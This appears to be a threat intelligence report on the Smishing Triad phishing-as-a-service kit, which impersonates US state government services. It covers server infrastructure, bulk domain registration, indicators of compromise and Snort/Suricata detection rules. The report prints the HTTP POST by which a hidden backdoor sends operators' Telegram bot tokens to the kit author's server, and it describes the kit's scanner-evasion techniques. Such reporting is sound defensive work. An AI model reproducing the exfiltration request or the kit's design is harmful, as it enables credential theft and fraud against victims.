Inside the Smishing Triad: Dissecting a Javalin-Based PhaaS Operation Targeting US Government Services
Published: 2026-03-08 | TLP:WHITE | Breakglass Intelligence
TL;DR
A Chinese-origin phishing-as-a-service (PhaaS) operation known as the Smishing Triad continues to run at full scale despite Google's November 2025 RICO lawsuit. Our investigation mapped four distinct server nodes, 61 campaign domains registered over 28 days, and uncovered a novel Javalin/Kotlin-based phishing kit that represents a significant departure from the group's documented PHP infrastructure. Most critically, we confirmed a live backdoor through which the kit author siphons Telegram bot tokens from every operator who deploys the kit, granting him universal access to all stolen victim data across the entire operation.
The Kit Author is Backdooring His Own Customers
The most consequential finding in this investigation is not the phishing infrastructure itself -- it is what the kit author does to the operators who pay to use it.
Wang Duo Yu, the developer behind the "Lighthouse" phishing kit and the Smishing Triad's core tooling, embeds an obfuscated backdoor in the JQ.js file distributed with every kit deployment. This backdoor silently exfiltrates the operator's Telegram bot token -- the same token used to receive stolen victim data -- to a server controlled exclusively by Wang Duo Yu.
The token theft server sits at 102.165.14.4 (DuckDNS hostname: telegrambotcheck.duckdns.org), running a Python Twisted web application (TwistedWeb/24.3.0) on a Windows machine. The exfiltration protocol is straightforward:
POST /receive_token HTTP/1.1
Host: 102.165.14.4:5000
Content-Type: application/x-www-form-urlencoded
token={OPERATOR_BOT_TOKEN}&referrer=loco
The server validates submitted tokens against the Telegram Bot API before accepting them. Invalid or malformed tokens are rejected with "Invalid token or missing referrer." -- meaning Wang Duo Yu only stores confirmed-valid bot tokens. The referrer=loco parameter acts as a hardcoded authentication check; other values are rejected.
The implication is severe: every victim who enters their credit card number, SSN, or OTP code into any Smishing Triad phishing page -- regardless of which operator deployed it -- has their data accessible to Wang Duo Yu personally. With 4,400+ Telegram subscribers and a claimed 300+ "front desk staff" operating worldwide, the volume of compromised tokens (and by extension, compromised victim data) is substantial.
The token theft server exposes additional attack surface: RDP on port 3389, WinRM on ports 5985 and 47001, and RPC on port 135. A second Windows host at 102.165.14.2 in the same /24 range (NetBIOS hostname: WIN-LM92I1KCNUP) runs a service on port 8500, suggesting a broader operational footprint within this IPXO-leased IP block.
A New Generation of Kit: Javalin Replaces PHP
Previous public reporting on the Smishing Triad has consistently documented PHP-based kits with client-side Telegram API calls embedded in JavaScript. The infrastructure we investigated runs something different entirely.
Server Stack
The primary phishing server at 47.245.93.160 (Alibaba Cloud, AS45102, Singapore) runs a Javalin framework application on Jetty, fronted by nginx as a reverse proxy. Javalin is a lightweight web framework for Java and Kotlin, rarely seen in phishing operations. The server returned a unique servlet fingerprint:
io.javalin.jetty.JavalinJettyServlet-3ba0ae41
This hash is a high-fidelity fingerprint. Any other server on the internet returning this exact servlet identifier is running the same compiled kit version and can be attributed with high confidence.
Host-Based Campaign Routing
The Javalin application uses HTTP Host header values to route victims to the correct phishing page. Each campaign domain maps to a specific state-targeted phishing template via a database lookup. The server returns a 404 with a zero-byte body when no matching campaign is found for the requested Host header, and a 200 with zero bytes for requests without any Host header at all. This behavior makes the server effectively invisible to mass scanning tools -- Shodan, for instance, only indexes port 22 (OpenSSH 9.6p1) on this IP.
Admin Panel
The kit exposes a WebSocket-based admin panel at /console/, protected by what appears to be IP-based whitelisting rather than credential-based authentication. All tested authentication methods -- HTTP Basic, Bearer tokens, cookies, query parameters -- return 401 Unauthorized identically, suggesting the rejection occurs in a Javalin before() filter that checks the source IP before any authentication logic executes.
Subpaths including /console/login, /console/api, /console/ws, and /console/auth all return 400 Bad Request, confirming a full administrative application behind the access control layer. Several additional endpoints (/msg, /message, /notify, /hook, /wh, /gate, /gateway) return 404 responses with non-zero body sizes (27-32 bytes), distinguishing them from undefined routes. These are likely disabled or dormant notification and webhook endpoints within the Javalin router.
Server-Side Exfiltration
The shift to Javalin enables a critical operational improvement: server-side data exfiltration. Unlike PHP kits where Telegram bot tokens are often extractable from client-side JavaScript or DOM inspection, the Javalin server calls the Telegram Bot API directly from the backend. Stolen card data, PII, and OTP codes are formatted and sent via api.telegram.org/bot{TOKEN}/sendMessage entirely server-side, making token extraction impossible without access to the application source code or server compromise.
Domain Infrastructure at Scale
Registration Velocity
During our 28-day observation window (February 4 -- March 3, 2026), we tracked 61 unique domains resolving to the target IP. All were registered through Gname.com Pte. Ltd. (IANA ID 1923), a Singapore-based registrar consistently observed in Smishing Triad operations.
Batch registration evidence from March 2 illustrates the automation:
| Domain | Registered | Delta |
|---|---|---|
gov-jksr.bond | 2026-03-02T11:26:17.0Z | -- |
gov-jkas.bond | 2026-03-02T11:26:19.0Z | +2 seconds |
gov-jkjk.bond | 2026-03-02T11:26:21.0Z | +2 seconds |
gov-jkjvb.bond | 2026-03-02T11:26:21.0Z | same second |
gov-jkqe.bond | 2026-03-02T11:26:21.0Z | same second |
Five domains in four seconds, all via Gname.com's API. Nameserver pairs (A{N}.SHARE-DNS.COM / B{N}.SHARE-DNS.NET) are assigned sequentially but all resolve to the same Cloudflare IP (172.64.53.25), making the numbering cosmetic.
Campaign Phases
The 61 domains fell into five distinct campaign phases by targeting pattern:
| Phase | Dates | Targets | Domains | TLDs |
|---|---|---|---|---|
| Phase 1 | Feb 4--9 | Vehicle registration, Massachusetts | 15 | .cc, .bond |
| Phase 2 | Feb 10--12 | Massachusetts, New Mexico, Vehicle | 12 | .bond |
| Phase 3 | Feb 13--18 | Massachusetts, New Mexico, Tennessee, Vehicle | 25 | .bond, .cc |
| Phase 4 | Feb 26--28 | Toll roads (ExpressLane), Missouri | 3 | .bond |
| Phase 5 | Mar 2--3 | Georgia, Minnesota, Texas | 5 | .bond |
Massachusetts was the most heavily targeted state with 27 domains across the observation period. The operation also impersonated California, Hawaii, New Mexico, Tennessee, Missouri, Georgia, Minnesota, and Texas government services, as well as generic vehicle registration and toll road (ExpressLane) portals.
Wildcard DNS and TLS Automation
All campaign domains use wildcard DNS (*.gov-{random}.bond resolves to 47.245.93.160), allowing the operator to target any US state with a simple subdomain without additional DNS configuration. TLS certificates are provisioned automatically via Let's Encrypt R13 for each active campaign subdomain, with observed certificates for ca.gov-bed.bond, mn.gov-jksr.bond, and tx.gov-jkas.bond.
Domain lifespan is consistently 2-7 days before registrar suspension (serverHold) or DNS removal (NXDOMAIN). At time of investigation, 5 domains remained DNS-active while approximately 56 had been suspended.
SMS Distribution: Oak-Tel / Carrie SMS
Smishing messages are distributed via the Oak-Tel platform (also branded "Carrie SMS"), registered at oak-tel.com through Alibaba Cloud's HiChina registrar. The domain was created on 2024-02-20 and remains DNS-active, though the web interface is unreachable from external networks -- likely geo-restricted or accessible only via an internal API.
An Indonesian operator contact number (+62 853 59885180) is associated with the platform, consistent with the Smishing Triad's documented use of Southeast Asian infrastructure for SMS delivery. Victims receive messages impersonating toll road authorities, DMVs, or state government agencies, with links formatted as https://{state}.gov-{random}.bond/?var={tracking_id}.
MITRE ATT&CK Mapping
| Technique ID | Technique | Application |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Link | SMS messages with malicious URLs to state-impersonating domains |
| T1583.001 | Acquire Infrastructure: Domains | Automated bulk registration of 61+ domains via Gname.com API |
| T1583.003 | Acquire Infrastructure: Virtual Private Server | Alibaba Cloud Singapore VPS, IPXO-leased Windows server |
| T1585.002 | Establish Accounts: Email Accounts | Singapore-based registrar accounts for domain procurement |
| T1608.005 | Stage Capabilities: Link Target | State-targeted phishing pages with multi-stage data collection |
| T1036.005 | Masquerading: Match Legitimate Name or Location | gov-*.bond domains with US state abbreviation subdomains |
| T1567.003 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Telegram Bot API used for real-time exfiltration of stolen data |
| T1199 | Trusted Relationship | Kit author backdoor exploits trust relationship with kit operators |
Google RICO Lawsuit: Disrupted but Not Dismantled
In November 2025, Google filed a RICO lawsuit in the U.S. District Court, Southern District of New York, against 25 unnamed individuals behind the Lighthouse kit and Smishing Triad operations. The legal action cited violations of the Racketeer Influenced and Corrupt Organizations Act, the Lanham Act, and the Computer Fraud and Abuse Act.
Google claimed the operation was "shut down" on November 14, 2025, and several Telegram channels were taken down. Silent Push confirmed, however, that many websites remained active using Lighthouse kit code. Our investigation provides definitive proof that the operation is fully active as of March 2026, with new domains registered daily and all server infrastructure operational. Updated kit pricing ranges from $88/week to $1,588/year, up from previously reported $20--$50 tiers.
Defensive Recommendations
Network-Level Controls
- Block phishing server IP: Add
47.245.93.160to firewall deny lists and threat intelligence feeds. - Block token theft server: Deny all traffic to/from
102.165.14.4andtelegrambotcheck.duckdns.org. - DNS sinkhole: Implement regex-based DNS blocking for patterns matching
*.gov-*.bond,*.gov-*.top,*.gov-*.vip, andvehicle.gov*.cc. - TLS inspection: Alert on connections where the SNI or certificate CN matches
gov-{chars}.bondpatterns issued by Let's Encrypt R13.
Detection Rules
Deploy the following Snort/Suricata signatures:
alert tls any any -> 47.245.93.160 443 (msg:"SMISHING-TRIAD Phishing Server TLS"; \
tls.sni; content:".gov-"; content:".bond"; sid:2026030301; rev:1;)
alert http any any -> 102.165.14.4 5000 (msg:"SMISHING-TRIAD Token Theft POST"; \
content:"POST"; http_method; content:"/receive_token"; http_uri; \
content:"referrer=loco"; http_client_body; sid:2026030302; rev:1;)
alert dns any any -> any any (msg:"SMISHING-TRIAD Domain Pattern"; \
dns.query; pcre:"/[a-z]+\.gov-[a-z0-9]+\.(bond|top|vip|sbs|cfd|cc)/"; \
sid:2026030304; rev:1;)
Threat Hunting
- Scan for the servlet fingerprint
JavalinJettyServlet-3ba0ae41across internet-facing hosts to identify additional kit deployments. - Monitor Certificate Transparency logs for new
gov-*.bondissuances via Let's Encrypt R13. - Track Gname.com (IANA ID 1923) bulk registrations in
.bondand.ccTLDs withshare-dnsnameservers. - Pivot on SSH key fingerprints (RSA:
SHA256:sMcz7nc/35hazyOKVuJ4KXyDLS23XMwzQ1j+/vk8zS4) to identify related infrastructure.
Abuse Reporting
| Entity | Contact | Purpose |
|---|---|---|
| Alibaba Cloud | DomainAbuse@service.aliyun.com | Hosting provider for phishing server |
| Gname.com | complaint@gname.com | Domain registrar |
| IPXO | abuse@ipxo.com | IP lease provider for token theft server |
| Telegram | abuse@telegram.org | Report accounts @wangduoyu0 (ID: 686449807), @laowang_notice |
| FBI IC3 | ic3.gov | US-targeted financial fraud |
Indicators of Compromise
Network Infrastructure
| Type | Indicator | Context |
|---|---|---|
| IPv4 | 47.245.93.160 | Primary phishing server (Alibaba Cloud SG, AS45102) |
| IPv4 | 102.165.14.4 | Token theft backdoor server (IPXO/Windows) |
| IPv4 | 102.165.14.2 | Related Windows host (NetBIOS: WIN-LM92I1KCNUP) |
| ASN | AS45102 | Alibaba (US) Technology Co., Ltd. |
| ASN | AS397423 | Tier.Net / IPXO (token theft server) |
Domains (Active at Time of Investigation)
| Domain | Target | Registration Date |
|---|---|---|
gov-jksr.bond | Minnesota (wildcard) | 2026-03-02 |
gov-jkas.bond | Texas (wildcard) | 2026-03-02 |
gov-jkjk.bond | Georgia (wildcard) | 2026-03-02 |
gov-jkjvb.bond | Georgia (wildcard) | 2026-03-02 |
gov-jkqe.bond | Georgia (wildcard) | 2026-03-02 |
telegrambotcheck.duckdns.org | Token theft C2 | Dynamic DNS |
oak-tel.com | SMS distribution platform | 2024-02-20 |
Domains (Suspended / Historical -- Partial List)
| Domain | Target | TLD |
|---|---|---|
gov-bed.bond | California / Hawaii | .bond |
lxhjieyi.online | Generic | .online |
expresslane.bdxez.bond | Toll roads | .bond |
gov-umn.bond | Missouri | .bond |
gov-lvf.bond | Missouri | .bond |
appexpress.top | Historical C2 (Lighthouse dev) | .top |
TLS Certificates
| Subject CN | Serial | SHA-256 Fingerprint | Issuer |
|---|---|---|---|
ca.gov-bed.bond | 0604386D53DFB576F34FDF7F3655951ACB96 | 82:C1:FF:3E:57:50:A0:4F:2F:97:... | Let's Encrypt R13 |
SSH Fingerprints (47.245.93.160)
| Algorithm | Fingerprint |
|---|---|
| RSA | SHA256:sMcz7nc/35hazyOKVuJ4KXyDLS23XMwzQ1j+/vk8zS4 |
| ECDSA | SHA256:/3UROuQ4EYAhxUEtkPXxySb6DzjzosagPxWfaoISERg |
| ED25519 | SHA256:+mbJ2jL339vk6o/BU8Fhs4OC8mW039G3O8fTituGo2Q |
Servlet Fingerprint
| Fingerprint | Framework |
|---|---|
JavalinJettyServlet-3ba0ae41 | Javalin on Jetty (Java/Kotlin phishing kit) |
Threat Actor Identifiers
| Identifier | Value |
|---|---|
| Telegram User ID | 686449807 |
| Telegram Handle | @wangduoyu0 |
| Personal Handle | @wangduofish |
| Notice Channel | @laowang_notice (prev: @dy_tongbu) |
ceshi@gmail.com | |
| Kit Name | Lighthouse |
| PRODAFT Tracking | LARVA-241 |
Domain Pattern Detection (Regex)
# State government impersonation
^[a-z]{2,10}\.gov-[a-z0-9]{2,5}\.(bond|top|vip|sbs|cfd|online|xin|cc)$
# Vehicle registration impersonation
^vehicle\.gov[a-z0-9]{2,4}\.(cc|bond)$
# Toll road impersonation
^expresslane\.[a-z0-9]{3,6}\.(bond|top)$
Conclusion
The Smishing Triad remains one of the most prolific phishing-as-a-service operations in the world, and the Google RICO lawsuit has clearly failed to achieve lasting disruption. Our investigation reveals an operation that is not merely surviving but evolving: the migration from PHP to a Javalin/Kotlin stack with server-side exfiltration represents a deliberate effort to harden the kit against the kind of client-side analysis that has historically enabled rapid takedowns.
The token theft backdoor is the most operationally significant finding. Wang Duo Yu has constructed a system where every operator who pays for the Lighthouse kit unknowingly surrenders their Telegram bot token, granting the kit author a panoptic view of all stolen data across all deployments globally. This "scammer scamming scammers" dynamic complicates traditional threat modeling -- the kit author is simultaneously a tool vendor, a silent participant in every campaign, and a single point of compromise for the entire ecosystem.
The operational tempo speaks for itself: 61 domains in 28 days on a single IP, five domains registered in four seconds, wildcard DNS enabling instant targeting of any US state, and automated Let's Encrypt provisioning ensuring valid HTTPS on every campaign domain within minutes of registration. At the reported global scale of 25,000 active domains per 8-day window across 121+ countries, the Smishing Triad infrastructure represents an industrial-grade fraud operation that demands coordinated international law enforcement response and aggressive registrar-level intervention.
Defenders should prioritize deploying the detection signatures and IOCs documented here, monitor Certificate Transparency logs for the domain patterns identified, and report active infrastructure to the abuse contacts listed. The servlet fingerprint JavalinJettyServlet-3ba0ae41 is a high-confidence pivot point for identifying additional kit deployments that have not yet been publicly documented.
Breakglass Intelligence | intel.breakglass.tech Investigation conducted March 2--8, 2026